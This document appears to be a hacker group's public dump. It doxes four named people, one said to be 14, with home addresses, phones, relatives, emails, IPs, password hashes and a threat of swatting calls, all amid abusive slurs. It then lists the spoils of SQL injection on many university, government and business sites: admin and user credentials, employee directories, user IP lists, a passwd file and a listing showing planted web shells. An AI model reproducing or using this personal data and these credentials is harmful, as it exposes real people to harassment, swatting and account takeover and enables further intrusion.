>> DoX's On:
Hex00010, ProtocoL/Manst0rm, s3rverexe [s0lar] & Snood The Skid.
>> User Leaks From:
bayardadtools.com, ctrides.com, glinx.com, mine.nu, insynq.com, mmauniverse.com, bergeret.org, leapgeeks.com, atriumcaterers.com, yayu.org, christianword.net, 2laugh.com & otca.info
>> Admin Passwords From:
icijapan.com, smallflyingarts.com, maplepark.com, marketing-idea.org, cycu.edu.tw, multimania.fr, colmich.edu.mx, ntlworld.com, tripod.com, fullnet.com, stonaldn.com, ices.edu.mx, mobipassword.com, nutn.edu.tw & com.edu
>> Full Leaks On:
anosy.gov.mg, nbanews.com, itshuetamo.edu.mx, stanford.edu, fursuiters.co.uk, monetperfumes.com, pamframing.com, cam-ceeds.org [null], & bulkemail.netsanchar.com
======================================================================================================
Hex00010's DoX
======================================================================================================
Reason for DoX: You're just a fucking faggot, bro. Lol.
- - - - - - - - - - - - - - - - - - - - - - - - - - - -
Main Nickname: Hex00010
Main Email:uat666@hotmail.com
Real name: William Premore / William Palmer
Address:3393 Picken Store, RD Mason, TN 38049
Phone number: 901-294-3057
Mother: Lisa A Palmer
Father: Jeremy R Palmer
IP(s):67.142.163.22, 75.64.245.211, 94.75.217.248
Job(s): Federal Pussy
Xfire: demon771
-----------------------------------
Emails:
-----------------------------------
uat666@hotmail.com[Confirmed]
wpalmer114@email.itt-tech.edu[UNCONFIRMED]
wpalmer@dev-security.net[UNCONFIRMED]
williampalmer777@yahoo.com[UNCONFIRMED]
wpalmermscp@gmail.com[Confirmed]
forsaken_raiders@yahoo.com [Confirmed]
scyther777@live.com[Confirmed]
Scyther777@hotmail.com[Confirmed]
---------------------------------
-Twitter-
-----------------------------------
Hex's Twitter: https://twitter.com/Hex000101/
Real Twitter: https://twitter.com/williampremore
---------------------------------
Nicknames
-----------------------------------
Hex00010/
Hex000101
XXxxImmortalxxXX
scyther777
####################################################
#One of his email is " forsaken_raiders@yahoo.com "
#Which leads me to his alernates usernames,
#XXxxImmortalxxXX and scyther777
#http://in-secure.forumn.org/t648-hackers-grounded
#http://prntscr.com/csqxk
#scyther777@live.com
#####################################################
*******************************************
Picture&Link dump/proofs
*******************************************
http://prntscr.com/csqxk
XXxxImmortalxxXX = scyther777@live.com
XXxxImmortalxxXX = Forsaken_raiders@yahoo.com
http://tinychat.com/premore
FROM: https://twitter.com/williampremore/status/24530459123781632
http://prntscr.com/csryy -> Possible family member?
http://prntscr.com/cssmf -> XXxxImmortalxxXX -> scyther777@live.com
http://prntscr.com/cssuk -> x-DemoN77/demon771 -> Scyther777@hotmail.com
**VERY IMPORTANT!
Proof that Scythe777 = William Palmer = Hex00010:
http://prntscr.com/csteq
So technically:
XXxxImmortalxxXX = scyther777@live.com
scyther777 = William Palmer
Extra confirmation that Hex00010 = XXxxImmortalxxXX
http://prntscr.com/ctbig
--------------------------------------------
Hashes
--------------------------------------------
766ee790c52c18c10718d82e7bd830d4 : 397d
# ( http://prntscr.com/cssfg )
mysql> select passwd,0x3a,password_salt from smf_members where member_name LIKE '%hex0%' ;
+------------------------------------------+------+---------------+
| passwd | 0x3a | password_salt |
+------------------------------------------+------+---------------+
| 76dafbfbbdd4ffc2f04605ac6930d0165d78dbff | : | 397d |
+------------------------------------------+------+---------------+
1 row in set (0.00 sec)
one of hex's password hashes from a forum he goes on ^
-------------------------------------------
IRC
-------------------------------------------
he also run's windows, probably 7.
Proof: [1:35:05 PM] ****: >Hex00010< CTCP VERSION
-Hex00010- VERSION mIRC v7.19 Khaled Mardam-Bey
mIRC for windows
======================================================================================================
Snoody, The Script Kiddy's DoX
======================================================================================================
-------------------------
****Basic Name****
First Name: Parker
Middle Name:
Last Name: Nelson
-------------------------
****Online ID's****
Alias: Snoods, Thornkajom (Used in 2008 with the name Parker Nelson)
-------------------------
****Contact Information****
Phone Number:(425)334-6745
Address: 110 - 140th AVE NE
Secondary Address:
Mailing Address:110 - 140th AVE NE
Emails: snoods.parker@gmail.com, godsnoods@gmail.com
Fax:
***Internet Commucation***
Skype: xboxmbsnoods
AIM: xbmbsnoods
Windows Live: snoods.parker@gmail.com
-------------------------
****People Close****
Mother: Tracey Eliziabeth Nelson
Father: Todd Nelson
Sister: Julie Nelson
Brother: TJ Nelson
-------------------------
****Social Media****
Facebook: https://www.facebook.com/parker.nelson.127
Formspring: http://www.formspring.me/sn000ds
Youtube: http://www.youtube.com/user/ThornKajom
Gravatar: http://en.gravatar.com/thornkajom - http://gyazo.com/f2db0b6b7acfd14072045d52af77dd04
Yahoo: Parkerthorns@yahoo.com
Gmail: snoods.parker@yahoo.com
Yahoo Answers: http://answers.yahoo.com/activity?show=ZPZNBcUGaa&link=starred
-------------------------
****Account Info****
Paypal: snoods.parker@gmail.com
-------------------------
****GamerTag's****
PSN: ?
XBOX: TTG Snoods
Nintendo: ?
-------------------------
****Websites****
http://screamsaver.wordpress.com/author/thornkajom/ (notice date - 2008)
------------------------
****Jacked Shit**** (jackedbitch1337)
Club Penguin: http://gyazo.com/d6309d4e5b8eed0e8877526e5c9b34af,http://gyazo.com/6820211d13c068d449b0a36f11d6d172
XboxMB: http://gyazo.com/d6309d4e5b8eed0e8877526e5c9b34af
------------------------
****Fun Shit****
Bigboy words mister: http://gyazo.com/8a8af4afb811c3552f0523b528bb85af
======================================================================================================
Extra on Snood.
======================================================================================================
Domain ID:D38683596-LRMS
Domain Name:NAVYDEV.INFO
Created On:30-Jun-2011 22:33:42 UTC
Last Updated On:01-Jul-2012 22:28:51 UTC
Expiration Date:30-Jun-2013 22:33:42 UTC
Sponsoring Registrar:GoDaddy.com LLC (R171-LRMS)
Status:CLIENT DELETE PROHIBITED
Status:CLIENT RENEW PROHIBITED
Status:CLIENT TRANSFER PROHIBITED
Status:CLIENT UPDATE PROHIBITED
Status:AUTORENEWPERIOD
Registrant ID:CR87156314
Registrant Name:Parker Nelson
Registrant Organization:
Registrant Street1:110-140th AVE NE
Registrant Street2:
Registrant Street3:
Registrant City:Lake stevens
Registrant State/Province:Washington
Registrant Postal Code:98258
Registrant Country:US
Registrant Phone:+1.4253346745
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:godsnoods@gmail.com
=============================================================================
after search with phone number look who shows up :)
----------------------------------------------------
http://www.directorycentral.com/business/wa/lake-stevens/tracy-elizabeth-nelson-15384913.html
http://www.bizfind.us/48/175531/tracy-elizabeth-nelson/lake-stevens.aspx
http://www.ewashingtonpages.com/business/tracy-elizabeth-nelson
Sister: http://www.facebook.com/julie.nelson.7927
Father:http://www.facebook.com/todd.nelson.39904
=============================================================================
steam data
-----------
[center] Steam Name (At Time Of Incident): ParkeR ProductionS
Steam ID: STEAM_0:0:42572596
Steam Profile Link: http://steamcommunity.com/profiles/76561198045410920/
Admin You Were Banned By:
Length Of The Ban (If Known): Perm
Would You Like Your Ban Shortened or Repealed? (Shortened/Repealed): Repealed
Reason Given For Ban: Don't know
Did You Commit The Actions Stated In The Ban Reason? (Yes/No):
Extenuating Circumstances (If Yes):
What Really Happened (If No): Was trolling, was being VERY sarcastic. Was saying things such as "I'm unbannable with over 9000 proxies and stolen credit cards" Admin banned me, don't know the reason why. I did not do anything wrong, but players who were on that didn't like me said I kill innocents EVERY time I play which is false. I did it once on accident and served my time for it.
Additional Details: Alm was there and even said
I shouldn't have been banned. All I remember from who was there.
--End Copy--
===========================================================================
IP address:50.34.48.239 - http://bans.murdernetworks.com/index.php?p=banlist&hideinactive=false&searchText=STEAM_0:1:9320109
http://whatismyipaddress.com/ip/50.34.48.239 Matches up, same ISP as the one he uses for skype too:
50.34.247.223
-------------
http://www.geobytes.com/IpLocator.htm?GetLocation - seattle
50.34.48.239
------------
http://www.geobytes.com/IpLocator.htm?GetLocation - hmm another seattle?
50.34.49.126
------------
http://www.geobytes.com/IpLocator.htm?GetLocation
==========================================================================
Other Identity:
http://whois.polodomains.com/domain/rIFxGJxWDHHO9EJxai6_CQ.._info.html
Hawk, Mike
Email snoods.parker@gmail.com
2475 coach house dr
brookfield, wi 53045
US
+1.2627828255
===================================================================
Websites: snoodsgfx.net, navydev.info
===================================================================
Stress test on IP Address.
--------------------------
root@bt:~# ping 50.34.49.126
PING 50.34.49.126 (50.34.49.126) 56(84) bytes of data.
^C
--- 50.34.49.126 ping statistics ---
41 packets transmitted, 0 received, 100% packet loss, time 40320ms
------------------------------------------------------------------------------------------------------
======================================================================================================
s3rver.exe's DoX
======================================================================================================
Reason For DoXing: You're a plain fucking loser, Hardeek. Buy your way into more teams, why don't ya?
---------------------------------------------------------
Name; Hardeek Sharma
Age; 23
Location; Mandurah Western Australia 6210
Phone number; (089) 586-1715 (proof it's real http://www.reverseaustralia.com/lookup/0895861715/)
---------------------------------------------------------
Aliases;
GrimTheGod
HugoTheGod
s3rver.exe
g-wiz
doctor.exe
---------------------------------------------------------
Accounts on the interwebz (emails to);
}=emailz={
(hardeek.sharma2011@gmail.com)
(anon_ops@ymail.com)
(g-wiz@gmail.com)
(anon_ops@hotmail.co.uk
(s3rver@fbi.tf)
OtheR Accounts;
twitter.com/s3rverexe
twitter.com/s3rver_exe
http://www.youtube.com/user/StrikerPrototype
http://pastebin.com/u/s3rver
r00t1nj3ct(skype)
gangsta_rules1(other skype)
https://www.facebook.com/hardeek.sharma
https://twitter.com/#!/hardeekromantic
---------------------------------------------------------
Now for some embarssing shit;
http://i47.tinypic.com/34hb32o.png (how much do you have to pay for r00tw0rm mod?)
s3rverexe's old twitter @s3rver_exe got hacked by a ug hacker
>> Time for the swat phone calls
------------------------------------------------------------------------------------------------------
======================================================================================================
ProtocoL's DoX
======================================================================================================
Reason for DoXing: Launching that Wh0aMiRo0T shit to try & DoX myself {Bw0mp} & teammates.
>> How that ended: https://twitter.com/wh0amiro0t <<
TL;DR - You're a fucking loser. Dismissed.
-----------------------------------------------------------
Name: Phillip Quam
Age: 14
Address: 51306 Rush Lake Trail, Rush City, MN 55069, USA.
Home Phone: (320) 358-3051
Religion: Muslim
-----------------------------------------------------------
Twitters: @_ProtocoL & @Manst0rm
Emails: sexyprotocol@hotmail.com & protocal2@hotmail.com
Previous Passwords: iamsolegit & lolwut1337 & 3571h4x0r9312
-----------------------------------------------------------
FAMILY:
Mom: Linda M Quam
Age: 37
Dad: Michael Quam
Age: 41
Grandma: Ila Quam
Age: 65
Uncle: Maurice Quam
Age: 43
-----------------------------------------------------------
School: Rush City School District 139.
(320) 358-4855.
51001 Fairfield Ave
Rush City, MN 55069
======================================================================================================
End Of DoX's
======================================================================================================
>> At the end of the day, whoever was DoX'd is just a script kiddy, loser, or all around worthless
>> waste of space. So feel no remorse, they were asking for it. :P
======================================================================================================
Now For The Web-Hacking...
======================================================================================================
> - - - - - - - - - - - - - - - - - - - - STANFORD.EDU - - - - - - - - - - - - - - - - - - - - - - - <
STANFORD.EDU
Active DB: d_CTL_tomprof
Columns: 6
Tables: 1
MySQL Version: 5.1.63-0+
Table: Users
Columns: users.ID. username. password.
Login Found: hejtcvaj@gmail.com:ed0232cb29e2b34349332a51e4a8335e
> - - - - - - - - - - - - - - - - - - - - COM.EDU - - - - - - - - - - - - - - - - - - - - - - - <
TARGET: www.com.edu
Current DB: newsdesk << nothing useful.
DB primarily used: MySQL
DB Admin: admin:*CD487D8169ACF6CEACA7F089C52B960B97E91C1B
TL;DR - A lot of shit, but not many passwords. Just a short sample of what was found "other shit" wise.
-------------------------------------------------------------------
Admin Credentials from MySQL database, Users table, User/Password columns.
admin:*CD487D8169ACF6CEACA7F089C52B960B97E91C1B
admin2:*6AB0A3122043A3771BD61D69EA15E3697CBFBE23
phptest:*C260A4F79FA905AF65142FFE0B9A14FE0E1519CC
root:*CD487D8169ACF6CEACA7F089C52B960B97E91C1B
web:*CD487D8169ACF6CEACA7F089C52B960B97E91C1B
web2:*435D03C6084F192B292E79A5F06B6A7B48572B83
wordpress:*6AB0A3122043A3771BD61D69EA15E3697CBFBE23
-------------------------------------------------------------------
Some Employees + their Emails/Extensions [Only A-B, because there were TOO many]
Alan Bigos - abigos@com.edu - 8327 - SCI-115
Alesha Vardeman Aulds - aaulds@com.edu - 8432 - LMCR
Ali Ravandi - aravandi@com.edu - 8225 - SCI-107
Alice Watford - awatford@com.edu - 8300 - LRC-219
Alice Whistler - awhistler@com.edu - 8646 - CLC
Amanda Bezemek - abezemek@com.edu - 8360 - FAB-104
Amanda Garza - agarza@com.edu - 8308 - ADM-141
Barry Penland - bpenland@com.edu - 8403 - ADM-125B
Bernie Smiley - bsmiley@com.edu - 8356 - LRC-236
Beth Hammett - bhammett@com.edu - 8389 - LRC-264
Betty Verrett - bverrett@com.edu - 8611 - TVB-1660
Bill Raley - braley@com.edu - 8283 - TVB-1502
BJ Whitburn - bjwhitburn@com.edu - 8299 - PSC-108
Blanca Comeaux - bcomeaux@com.edu - 8212 - LRC-Suite A
Bonnie Harrill - bharrill@com.edu - 8365 - GCSI-105
Bonnie Mitchell - blmitchell@com.edu - 8605 - TVB-1624
Bonnie Myers - bmyers@com.edu - 8226 - Delmar - Senior Center
Brad Traylor - btraylor@com.edu - 8531 - TVB-1572
Brett Stephens - bstephens@com.edu - 8206 - L-122
-------------------------------------------------------------------
> - - - - - - - - - - - - - - - - - - - ITSHUETAMO.EDU - - - - - - - - - - - - - - - - - - - - - - <
TARGET: www.itshuetamo.edu.mx
Current DB: internetworks-s10219_generaltec
Not too much vital shit, only one account on the site..
Potential Admin: ivanbeltran_ortiz@hotmail.com:21101986$$
-------------------------------------------------------------------------------------
TABLES/COLUMNS ;
TABLE:actividades
COLUMNS: clave, inicio, fin, descripcion
TABLE: archivos
COLUMNS: clave, nombre, titulo
TABLE:noticia
COLUMNS: clave, fecha, titulo, descripcion, archivo, imagen
TABLE: paginas
COLUMNS: id_pagina, titulo, categoria, archivo, fechapublica, descripcion, imagen
TABLE: usuarios
COLUMNS: usuario, password << used to get: ivanbeltran_ortiz@hotmail.com:21101986$$
> - - - - - - - - - - - - - - - - - - - - ANOSY.GOV.MG - - - - - - - - - - - - - - - - - - - - - - - <
####################
### ANOSY.GOV.MG ###
####################
SQLi + Way too many tables/columns to list, so I'll just drop the admin info/email.
User: admin
Email: davida@anre.gov.mg
Pass: 6db1d285221baec58a201ae58b378765:ATekKqGVm8uVKNbW
User: anosy
Email: anosy@anosy.gov.mg
Pass: 087d1bfc0006458bfe42791f516d548e:u1qRRCDWVEm699BD
> - - - - - - - - - - - - - - - - - - - - NBANEWS.US HACK - - - - - - - - - - - - - - - - - - - - - <
###################
### NBANEWS.COM ###
###################
Admin User: admin
Admin Pass: q]z/q]z/
TABLE: admin
COLUMNS: id. name. username. password. links. config. ads. admins. email. notes.
TABLE:ads
COLUMNS: nowdate. id. name. code. clicks. date. type. admin_id. template.
TABLE: config
COLUMNS: id. sitename. siteurl. sitetitle. time. email. toplinks. template. keywords. upload. vistis. sitestate. sitestatemsg. redirect_host. redirect_redirector.
TABLE: links
COLUMNS: id. url. name. size. author. admin_id. downloads. date.
TABLE: linkso
COLUMNS: id. url. name. size. author. admin_id. downloads. date.
TABLE: online
COLUMNS: ip. time.
TABLE: redirect_host
COLUMNS: id. host.
> - - - - - - - - - - - - - - - - - - - - - PAMFRAMING ROOT - - - - - - - - - - - - - - - - - - - - <
Target: www.pamframing.com
drwxr-xr-x 4 pamframing 4096 Apr 22 15:48 .
drwxr-xr-x 10 pamframing 4096 Apr 22 15:49 ..
-rw-r--r-- 1 pamframing 2694 Apr 22 15:42 1.jpg
-rw-r--r-- 1 pamframing 47975 Apr 22 15:42 2X-V3.jpg
-rw-r--r-- 1 pamframing 2660 Apr 22 15:42 2X-V3.php.gif
-rw-r--r-- 1 pamframing 19687 Apr 22 15:43 300pl.jpg
-rw-r--r-- 1 pamframing 7178 Apr 22 15:42 30mp.jpg
-rw-r--r-- 1 pamframing 31993 Apr 22 15:42 3m_breatheasy_be_10_papr_bu.gif
-rw-r--r-- 1 pamframing 14975 Apr 22 15:42 3pse.jpg
-rw-r--r-- 1 pamframing 920 Apr 22 15:43 529bypass.php
-rw-r--r-- 1 pamframing 25123 Apr 22 15:42 5p.jpg
-rw-r--r-- 1 pamframing 18148 Apr 22 15:42 5p2.jpg
-rw-r--r-- 1 pamframing 41499 Apr 22 15:44 Bullardjpg.jpg
-rw-r--r-- 1 pamframing 82707 Apr 22 15:45 Decontamination-Kit.jpg
-rw-r--r-- 1 pamframing 26605 Apr 22 15:45 F16036~wn.jpg
-rw-r--r-- 1 pamframing 37555 Apr 22 15:46 First\ Aid\ Kit.jpg
-rw-r--r-- 1 pamframing 1293 Apr 22 15:46 GIrsl.gif
-rw-r--r-- 1 pamframing 18291 Apr 22 15:46 GasMask.jpg
-rw-r--r-- 1 pamframing 42609 Apr 22 15:47 Homesub1.gif
-rw-r--r-- 1 pamframing 40556 Apr 22 15:47 McroTrk_SlimTrak_GPS.jpg
-rw-r--r-- 1 pamframing 37555 Apr 22 15:48 NthSfty_019743-0030L_25\ Person_First\ Aid\ Kit.jpg
-rw-r--r-- 1 pamframing 37735 Apr 22 15:48 Pg106_2.jpg
-rw-r--r-- 1 pamframing 3348 Apr 22 15:48 SST-MA1964-30-449_L.jpg
-rw-r--r-- 1 pamframing 3177 Apr 22 15:48 S_PNP2060.jpg
-rw-r--r-- 1 pamframing 94939 Apr 22 15:48 Style.php
-rw-r--r-- 1 pamframing 8372 Apr 22 15:48 Trasub1.jpg
-rw-r--r-- 1 pamframing 152770 Apr 22 15:48 Underpiner\ IM-5P.jpg
-rw-r--r-- 1 pamframing 17610 Apr 22 15:48 Video.jpg
-rw-r--r-- 1 pamframing 105542 Apr 22 15:48 Winter.jpg
-rw-r--r-- 1 pamframing 47975 Apr 22 15:48 X-V3.php.gif
-rw-r--r-- 1 pamframing 209120 Apr 22 15:48 Xgroupvn.php
drwxr-xr-x 2 pamframing 4096 Apr 22 15:42 _notes
-rw-r--r-- 1 pamframing 13761 Apr 22 15:43 access.jpg
-rw-r--r-- 1 pamframing 3478 Apr 22 15:43 add_to_cart.jpg
-rw-r--r-- 1 pamframing 57636 Apr 22 15:43 aut2000.jpg
-rw-r--r-- 1 pamframing 10682 Apr 22 15:43 barbie.jpg
-rw-r--r-- 1 pamframing 53242 Apr 22 15:43 basket.jpg
-rw-r--r-- 1 pamframing 110188 Apr 22 15:43 bbb.php
-rw-r--r-- 1 pamframing 1721 Apr 22 15:43 blue_guns.gif
-rw-r--r-- 1 pamframing 23667 Apr 22 15:44 books.gif
-rw-r--r-- 1 pamframing 8185 Apr 22 15:44 buckle.jpg
-rw-r--r-- 1 pamframing 43702 Apr 22 15:44 bunlam1.php
-rw-r--r-- 1 pamframing 50184 Apr 22 15:44 c16.jpg
-rw-r--r-- 1 pamframing 3780 Apr 22 15:44 car7.jpg
-rw-r--r-- 1 pamframing 2948 Apr 22 15:44 car9.jpg
-rw-r--r-- 1 pamframing 30679 Apr 22 15:44 ce.jpg
-rw-r--r-- 1 pamframing 4874 Apr 22 15:44 change_password_ov.jpg
-rw-r--r-- 1 pamframing 5979 Apr 22 15:44 clothing_category.JPG
-rw-r--r-- 1 pamframing 33781 Apr 22 15:45 coat.jpg
-rw-r--r-- 1 pamframing 7192 Apr 22 15:45 coming-soon.jpg
-rw-r--r-- 1 pamframing 5282 Apr 22 15:45 conspace_voice_amplifier.gif
-rw-r--r-- 1 pamframing 2406 Apr 22 15:45 contact_us.jpg
-rw-r--r-- 1 pamframing 7827 Apr 22 15:45 corrugated.jpg
-rw-r--r-- 1 pamframing 7475 Apr 22 15:45 cuibap.php.gif
-rw-r--r-- 1 pamframing 38900 Apr 22 15:45 dimension.gif
-rw-r--r-- 1 pamframing 34650 Apr 22 15:45 drinking_baby.bmp
-rw-r--r-- 1 pamframing 5249 Apr 22 15:45 equipment.gif
-rw-r--r-- 1 pamframing 7697 Apr 22 15:46 fao_502-h.jpg
-rw-r--r-- 1 pamframing 5625 Apr 22 15:46 fast.jpg
-rw-r--r-- 1 pamframing 39980 Apr 22 15:46 fieldbook.gif
-rw-r--r-- 1 pamframing 28254 Apr 22 15:46 first.jpg
-rw-r--r-- 1 pamframing 4887 Apr 22 15:46 game_played.jpg
-rw-r--r-- 1 pamframing 3864 Apr 22 15:46 hatch_PC290.jpg
-rw-r--r-- 1 pamframing 22061 Apr 22 15:46 head04.jpg
-rw-r--r-- 1 pamframing 51204 Apr 22 15:46 head3.jpg
-rw-r--r-- 1 pamframing 55229 Apr 22 15:46 header.php
-rw-r--r-- 1 pamframing 17981 Apr 22 15:47 hlmt.gif
-rw-r--r-- 1 pamframing 16066 Apr 22 15:47 homelandproduc1.gif
-rw-r--r-- 1 pamframing 37864 Apr 22 15:47 homelandproduc3.gif
-rw-r--r-- 1 pamframing 18291 Apr 22 15:47 homelandproduct2.jpg
-rw-r--r-- 1 pamframing 18291 Apr 22 15:47 homelandsecurity.jpg
-rw-r--r-- 1 pamframing 25458 Apr 22 15:47 homesub2.gif
-rw-r--r-- 1 pamframing 9980 Apr 22 15:47 hyflex.jpg
-rw-r--r-- 1 pamframing 6322 Apr 22 15:47 im2se.jpg
-rw-r--r-- 1 pamframing 16112 Apr 22 15:47 im3.jpg
-rw-r--r-- 1 pamframing 8934 Apr 22 15:47 im350-2.jpg
-rw-r--r-- 1 pamframing 34672 Apr 22 15:47 im350.jpg
-rw-r--r-- 1 pamframing 16875 Apr 22 15:47 im3501_1.jpg
-rw-r--r-- 1 pamframing 8413 Apr 22 15:47 im4p.jpg
-rw-r--r-- 1 pamframing 24810 Apr 22 15:47 image008.jpg
-rw-r--r-- 1 pamframing 85664 Apr 22 15:47 image009.jpg
-rw-r--r-- 1 pamframing 41846 Apr 22 15:47 interface.jpg
-rw-r--r-- 1 pamframing 27386 Apr 22 15:47 manual.jpg
-rw-r--r-- 1 pamframing 51468 Apr 22 15:47 maxi.jpg
-rw-r--r-- 1 pamframing 9388 Apr 22 15:47 md_apr_optifit.jpg
-rw-r--r-- 1 pamframing 28424 Apr 22 15:47 military\ product.jpg
-rw-r--r-- 1 pamframing 11847 Apr 22 15:47 mitlsub1.gif
-rw-r--r-- 1 pamframing 33781 Apr 22 15:47 mitproduct2.jpg
-rw-r--r-- 1 pamframing 14092 Apr 22 15:47 mitproduct3.jpg
-rw-r--r-- 1 pamframing 3532 Apr 22 15:47 more1.jpg
-rw-r--r-- 1 pamframing 6598 Apr 22 15:47 msub2.jpg
-rw-r--r-- 1 pamframing 1594644 Apr 22 15:48 nature_wallpapers-001_copy.jpg
-rw-r--r-- 1 pamframing 2655 Apr 22 15:48 no_image_small.jpg
-rw-r--r-- 1 pamframing 3477 Apr 22 15:48 pg105_1.jpg
-rw-r--r-- 1 pamframing 8751 Apr 22 15:48 polarion_hid_searchlight_PF40.bmp
-rw-r--r-- 1 pamframing 84318 Apr 22 15:48 prisma_ce.jpg
drwxr-xr-x 2 pamframing 4096 Apr 22 15:48 resized
-rw-r--r-- 1 pamframing 62157 Apr 22 15:48 s30_dekor.jpg
-rw-r--r-- 1 pamframing 14092 Apr 22 15:48 safetyeye.jpg
-rw-r--r-- 1 pamframing 4927 Apr 22 15:48 search.jpg
-rw-r--r-- 1 pamframing 14325 Apr 22 15:48 sec4ever.php
-rw-r--r-- 1 pamframing 9282 Apr 22 15:48 sigma2000.jpg
-rw-r--r-- 1 pamframing 18478 Apr 22 15:48 smart.jpg
-rw-r--r-- 1 pamframing 43 Apr 22 15:48 spacer.gif
-rw-r--r-- 1 pamframing 5966 Apr 22 15:48 st_fire_trax_fpv_ring.gif
-rw-r--r-- 1 pamframing 17610 Apr 22 15:48 trainingp1.jpg
-rw-r--r-- 1 pamframing 3993 Apr 22 15:48 trainingp2.jpg
-rw-r--r-- 1 pamframing 13395 Apr 22 15:48 trainingp3.jpg
-rw-r--r-- 1 pamframing 37398 Apr 22 15:48 triosyn_resp_t3000_t3100.gif
-rw-r--r-- 1 pamframing 37864 Apr 22 15:48 triosyn_resp_t5000.gif
-rw-r--r-- 1 pamframing 4963 Apr 22 15:48 trsub2.jpg
-rw-r--r-- 1 pamframing 5194 Apr 22 15:48 update_profile.jpg
-rw-r--r-- 1 pamframing 209106 Apr 22 15:48 xprobi.php
> - - - - - - - - - - - - - - - - - - - - - NETSANCHAR ROOT - - - - - - - - - - - - - - - - - - - - <
Targ: [http://bulkemail.netsanchar.com]
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
hsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
> - - - - - - - - - - - - - - - - - - - - - ICES.EDU.MX ~ ~ - - - - - - - - - - - - - - - - - - - - <
TARGET: www.ices.edu.mx
METHOD: SQLi
Current DB: website [Not bothering to list tables/columns.. too many.]
Admin Info: admin:$P$B6ey50HP9fCU/3DJSYn5hLdDPxfCVs1
webmaster:webones
Admin Email: d8a_mx@hotmail.com
---------------------------------------------------------
USER LOGINS:
carreras:6b7efc47e7c76c3912203106eca72c56
preparatoria:6b7efc47e7c76c3912203106eca72c56
webmaster:0141f0f0597d8d7ff13b0b5571f7d124 [webones]
> - - - - - - - - - - - - - - - - - - - - - OTCA.INFO USERS - - - - - - - - - - - - - - - - - - - - <
Target: OTCA.INFO
Method: SQL Injection
Admin Info: administrador:wmm123
Admin E-Mails: imprensa@otca.org.br, lucas@brclick.com.br, sandra@otca.org.br
>> I will not be posting all tables/columns/users in this, because there are FAR too many to do.
>> So, I've shortened it accordingly to the user accounts retrieved from the injection.
administrador:1a0bb06800953e9007d3b993ca8f4884
Carlos.Salinas:113d6e3225a746569635e5ef89f1a271
Jannette.Aguirre:6bc451e791026cb3f0eb0e06603e11f0
Isabel.Lapena:202cb962ac59075b964b07152d234b70
Tobias.Leyva:edb684859b848362ec56904286947614
Luz.Mantilla:202cb962ac59075b964b07152d234b70
Brent.Millikan:656acfadeda5af45c881b8a91980514f
Victor.Miyakawa:202cb962ac59075b964b07152d234b70
Fernando.Alcantara:e2fc714c4727ee9395f324cd2e7f331f
Uriel.Murcia:202cb962ac59075b964b07152d234b70
Nestor.Ortiz:693f4ed7c1c1038c08eedbf3fa99b9d8
Ana.Pacheco:202cb962ac59075b964b07152d234b70
Jenner.Tavares:e2fc714c4727ee9395f324cd2e7f331f
Adriano.Sarmiento:1821db03c3e857162b34d56b4f028334
Sandra.Sguerra:2925a2783ea296623a229c5c3abd5671
Marisela.Torres:202cb962ac59075b964b07152d234b70
Fred.Chu:e2fc714c4727ee9395f324cd2e7f331f
Marle.Villacorta:e2fc714c4727ee9395f324cd2e7f331f
Edgar.Benitez:e2fc714c4727ee9395f324cd2e7f331f
Eduardo.Villegas:202cb962ac59075b964b07152d234b70
Javier.Delaguila:e2fc714c4727ee9395f324cd2e7f331f
Enrique.Rios:e2fc714c4727ee9395f324cd2e7f331f
> - - - - - - - - - - - - - - - - - - - - - YAYU.ORG DUMP~ - - - - - - - - - - - - - - - - - - - - - <
TARGET: www.yayu.org
Admin Info: 7a57a5a743894a0e:7a57a5a743894a0e
Login Page: http://bbs.yayu.org/login.php
--------------------------------------------------------------
USER IP'S [Incomplete: Too Many To Post]
217.64.115.160
200.104.169.209
217.64.115.160
41.140.22.120
83.80.134.156
189.242.239.186
83.80.134.156
188.41.81.210
80.77.91.221
175.138.34.90
41.143.11.65
41.137.74.192
41.107.173.65
175.141.194.74
41.137.57.199
120.59.68.88
196.217.238.48
59.177.139.17
203.87.176.19
88.241.61.247
203.87.176.19
66.30.140.35
94.208.33.118
94.208.33.118
218.19.204.254
218.19.204.254
217.114.211.245
93.89.216.26
93.89.216.26
93.89.216.26
220.171.155.23
--------------------------------------------------------------
USERS DUMP [incomplete, too many to post]
110160:e10adc3949ba59abbe56e057f20f883e
12312312:96e79218965eb72c92a549dd5a330112
348375641:6fd624d7466a6678d5e08dd14464a986
abanachange:f35364bc808b079853de5a1e343e7159
agcvtzkprh:92d7dcc35d60c50b00b85f2c3b20a228
agehlertfern:f35364bc808b079853de5a1e343e7159
